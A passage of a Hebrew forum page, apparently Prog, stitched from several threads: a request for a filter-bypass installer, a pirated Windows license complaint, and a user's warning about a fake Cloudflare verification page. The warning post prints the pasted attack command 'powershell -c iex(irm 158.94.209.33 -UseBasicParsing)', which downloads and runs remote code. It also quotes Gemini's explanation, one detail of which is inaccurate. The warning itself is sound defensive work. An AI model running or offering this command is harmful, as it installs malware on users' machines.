בקשה משתמשי נטפרי היקרים! עזרתכם בבקשה.

  • הוסף לסימניות
  • #1
אני מנסה להתקין תוכנת Wifree על מחשב נוסף והוא כותב לי הותקן בהצלחה למרות שזה לא הותקן במחשב זה, יש למישהו פתרון/קובץ התקנה של התוכנה ויכול לשלוח לי?
 
  • הוסף לסימניות
  • #2
אחרי שכותב לך הותקן בהצלחה אתה מצליח לגלוש על אינטרנט בלי סינון של נטפרי?
 

פרוגבוט

תוכן שיווקי
פרסומת

אשכולות דומים

רכשתי לפני כחודש מחשב חדש מאדם שמוכר מחשבים בצורה פרטית.
אחרי כעשרה ימים אני רואה שכתוב לי על המחשב "הפעל את WINDOWS" ,
כשעברתי להגדרות היה כתוב שיש בעיה עם מפתח הרשיון הארגוני של מערכת ההפעלה פניתי למוכר והוא הבטיח לשלוח קובץ שיסדר את העניין.
לאחר פניות מרובות מצידי והבטחות שהקובץ יישלח וכו' , רק אחרי כחודש נשלח אליי הקובץ המדובר וכשקבלתי אותו במייל בקשתי עזרה מGPT איך להתקין אותו והוא השיב לי שקבצים מהסוג הזה מסכנים את אבטחת המחשב, עלולים להפיץ וירוסים ופשוט להמנע משימוש.
פניתי שוב למוכר והוא כתב לי יש לך ווינדוס מקורי רוצה להשתמש בקובץ קרק תשתמשי אבל תפסיקי להטריד אותי.
מייל נוסף שניסיתי להסביר בו את הבעייה נקרא על ידו אך לא קיבלתי תגובה.
השאלה שלי מה אני אמורה לעשות עכשיו- אם רשיון הווינדוס שלי לא חוקי על מה זה אמור להשפיע במחשב והאם יש דרך לאלץ את המוכר לבטל את העסקה/ להתקין ווינדוס חוקי/לממן את עלות ההתקנה?
אשמח לכל עזרה ומידע בנושא!!!!!!!!!!!צילום מסך 2025-12-09 174914.pngצילום מסך 2025-12-09 180007.png
  • תודה
Reactions: קל זכות1 //
21 תגובות
ככל הנראה כבר היה על זה דיון אבל אני לא מוצאת
אני מאוד מתוסכלת מכך שפתאום לא נפתח לי תמונות בצ'אט בכלל
אפילו לכתוב דברים שקשורים לדת אסור (בית מקדש. בית כנסת וכו')
בעבודה יש לי אינטרנט לא חסום ואני כותבת משם דברים וזה מייצר לי תמונות כמו שאני מבקשת
אבל יש לי מעט מאוד זמן וזה לא אפשרי להסתמך על מה שיש בעבודה כי תמיד צריך לתקן
ככה שמצד אחד אני רוצה להשתמש בו מצד שני לא בא לי להיות תלותית באינטרנט רגיל שיש בעבודה גם מבחינת זמן ונגישות וגם זה שזה לא חסום למרות שאני לא משתמשת בו לדברים אחרים.
מרגישה תסכול נורא כבר כמה ימים כאילו שחבל בכלל שהתחלתי עם זה וגיליתי את זה כי אחרי שטועמים קשה להיגמל
גם ככה קשה לי מול מחשב אז לפחות אני רוצה להוציא מזה את המיטב שאני יכולה כדי שזה יהיה שווה את זה ולהתפתח
אבל החסימה קשה מאוד ומאז שיש לי נטפרי במחשב כבר כמה שנים אני כמעט לא עוסקת בגרפיקה
(קרה לי שהייתי צריכה קובץ מסוים תלת מימד של פרח וזה חסם לי.. הייתי צריכה לנסוע במיוחד למקום אחר שעה נסיעה בשביל להוריד ממחשב אחר את הפרח ואז להעביר למחשב שלי. סיפור אמיתי)
איך אפשר לא להרגיש מוגבלת כשזה המצב?
מרגישה שאני כבר מחכה ליום הזה שה' יזמן לי פרנסה אחרת ולא להזדקק למחשב
מי שיש לו מה לחזק אני אשמח מאוד. ומי שרק רוצה להגיב בצורה ביקורתית בבקשה שיחסוך כי לא קל לי להתמודד עם זה
  • שכוייח!
Reactions: שרי שיצר1 //
0 תגובות
ניסיתי להכנס לאתר של הרב אפרתי - נותן הכשרות
לאחר לחיצה על סימון - אתה לא רובוט...

הופתעתי מאוד לראות את זה:
1773765478164.png
נראה חשוד!

מאוד חשוד!!!

‫Gemini אמר​

אזהרה: מדובר בהונאה ובתוכנה זדונית (Malware)

התמונה שצירפת מציגה דף מזויף שמתחזה לשירות ההגנה Cloudflare, אך למעשה מדובר בשיטה להרצת קוד זדוני על המחשב שלך.

למה זה מסוכן?

ההוראות בתמונה מבקשות ממך לבצע רצף פעולות חריג מאוד:
  1. צירוף המקשים Win + R: פותח את חלון ה-"הפעלה" (Run) של ווינדוס, שמשמש להרצת פקודות מערכת.
  2. צירוף המקשים Ctrl + V: מדביק פקודה שהאתר העתיק ללוח הגזירים (Clipboard) שלך באופן אוטומטי ברגע שנכנסת לדף או לחצת על כפתור.
  3. לחיצה על OK: מריצה את הפקודה המודבקת.
מה קורה בפועל?ברגע שתלחץ על OK, המחשב יריץ פקודה (בדרך כלל פקודת PowerShell) שמורידה ומתקינה וירוס, תוכנת כופר או תוכנה לגניבת סיסמאות ופרטי בנק. אף שירות אימות לגיטימי (כמו Cloudflare) לא יבקש ממך להריץ פקודות ידניות בחלון ה-Run של המערכת.



מה עליך לעשות?

  • אל תבצע את ההוראות: אל תקיש על שום שילוב מקשים ואל תדביק דבר.
  • סגור את הלשונית מיד: צא מהאתר הזה ואל תחזור אליו.
  • סריקת וירוסים: מומלץ להריץ סריקה מלאה של האנטי-וירוס במחשב שלך (כמו Windows Defender או תוכנה מוכרת אחרת) ליתר ביטחון.
  • ניקוי היסטוריה: כדאי לנקות את הקבצים הזמניים והקוקיז בדפדפן.

בדקתי בלוח מה הפקודה שהוא רצה שאני אריץ במחשב....
זה הפקודה: powershell -c iex(irm 158.94.209.33 -UseBasicParsing) - סכנה! לא להריץ בשום אופן!!!!

תקראו טוב מה גיימני כותב שזה עושה למחשב שלכם...

זהירות! מדובר בתוכנה זדונית (Malware) ודאית.

הפקודה שהעתקת היא הוכחה חותכת לכך שמדובר בניסיון פריצה. בוא נפרק את הפקודה כדי שתבין בדיוק מה היא מנסה לעשות למחשב שלך:

  • powershell: מפעיל את ממשק הפקודות המתקדם של ווינדוס. לממשק זה יש הרשאות עמוקות לשינוי הגדרות מערכת.
  • iex (Invoke-Expression): פקודה שאומרת למחשב: "כל מה שתקבל בהמשך – תריץ אותו כקוד עכשיו".
  • irm (Invoke-RestMethod): פקודה להורדת תוכן מהאינטרנט.
  • 158.94.209.33: זוהי כתובת IP של שרת מרוחק (שאינו קשור ל-Cloudflare). הפקודה מנסה למשוך קובץ "תסריט" (Script) מהשרת הזה.
  • -UseBasicParsing: הוראה לדפדפן הפנימי להתעלם מבדיקות תאימות ולהריץ את הקוד במהירות.



מה המשמעות?

ברגע שהיית לוחץ על OK, המחשב שלך היה פונה לכתובת ה-IP הזו, מוריד קוד זדוני (כמו סוס טרויאני או תוכנת כופר) ומריץ אותו מיד ברקע, בלי שתראה חלון נוסף או אזהרה.

צעדים דחופים אם כבר הרצת את הפקודה:

  1. ניתוק מהאינטרנט: כבה את ה-Wi-Fi או נתק את כבל הרשת מיד כדי למנוע מהווירוס לשלוח מידע החוצה או להוריד רכיבים נוספים.
  2. סריקה במצב בטוח: הפעל את המחשב ב-"מצב בטוח" (Safe Mode) והרץ סריקה מלאה של אנטי-וירוס מעודכן.
  3. שינוי סיסמאות: ממכשיר אחר (טלפון או מחשב נקי), שנה סיסמאות לחשבונות רגישים (מייל, בנק, רשתות חברתיות).




מסקנה:

זהירות!!!

הצטרפות לניוזלטר

איזה כיף שהצטרפתם לניוזלטר שלנו!

מעכשיו, תהיו הראשונים לקבל את כל העדכונים, החדשות, ההפתעות בלעדיות, והתכנים הכי חמים שלנו בפרוג!

לוח מודעות

הפרק היומי

הפרק היומי! כל ערב פרק תהילים חדש. הצטרפו אלינו לקריאת תהילים משותפת!


תהילים פרק כה

אלְדָוִד אֵלֶיךָ יי נַפְשִׁי אֶשָּׂא:באֱלֹהַי בְּךָ בָטַחְתִּי אַל אֵבוֹשָׁה אַל יַעַלְצוּ אֹיְבַי לִי:גגַּם כָּל קוֶֹיךָ לֹא יֵבֹשׁוּ יֵבֹשׁוּ הַבּוֹגְדִים רֵיקָם:דדְּרָכֶיךָ יי הוֹדִיעֵנִי אֹרְחוֹתֶיךָ לַמְּדֵנִי:ההַדְרִיכֵנִי בַאֲמִתֶּךָ וְלַמְּדֵנִי כִּי אַתָּה אֱלֹהֵי יִשְׁעִי אוֹתְךָ קִוִּיתִי כָּל הַיּוֹם:וזְכֹר רַחֲמֶיךָ יי וַחֲסָדֶיךָ כִּי מֵעוֹלָם הֵמָּה:זחַטֹּאות נְעוּרַי וּפְשָׁעַי אַל תִּזְכֹּר כְּחַסְדְּךָ זְכָר לִי אַתָּה לְמַעַן טוּבְךָ יי:חטוֹב וְיָשָׁר יי עַל כֵּן יוֹרֶה חַטָּאִים בַּדָּרֶךְ:טיַדְרֵךְ עֲנָוִים בַּמִּשְׁפָּט וִילַמֵּד עֲנָוִים דַּרְכּוֹ:יכָּל אָרְחוֹת יי חֶסֶד וֶאֱמֶת לְנֹצְרֵי בְרִיתוֹ וְעֵדֹתָיו:יאלְמַעַן שִׁמְךָ יי וְסָלַחְתָּ לַעֲוֹנִי כִּי רַב הוּא:יבמִי זֶה הָאִישׁ יְרֵא יי יוֹרֶנּוּ בְּדֶרֶךְ יִבְחָר:יגנַפְשׁוֹ בְּטוֹב תָּלִין וְזַרְעוֹ יִירַשׁ אָרֶץ:ידסוֹד יי לִירֵאָיו וּבְרִיתוֹ לְהוֹדִיעָם:טועֵינַי תָּמִיד אֶל יי כִּי הוּא יוֹצִיא מֵרֶשֶׁת רַגְלָי:טזפְּנֵה אֵלַי וְחָנֵּנִי כִּי יָחִיד וְעָנִי אָנִי:יזצָרוֹת לְבָבִי הִרְחִיבוּ מִמְּצוּקוֹתַי הוֹצִיאֵנִי:יחרְאֵה עָנְיִי וַעֲמָלִי וְשָׂא לְכָל חַטֹּאותָי:יטרְאֵה אוֹיְבַי כִּי רָבּוּ וְשִׂנְאַת חָמָס שְׂנֵאוּנִי:כשָׁמְרָה נַפְשִׁי וְהַצִּילֵנִי אַל אֵבוֹשׁ כִּי חָסִיתִי בָךְ:כאתֹּם וָיֹשֶׁר יִצְּרוּנִי כִּי קִוִּיתִיךָ:כבפְּדֵה אֱלֹהִים אֶת יִשְׂרָאֵל מִכֹּל צָרוֹתָיו:
נקרא  2  פעמים
למעלה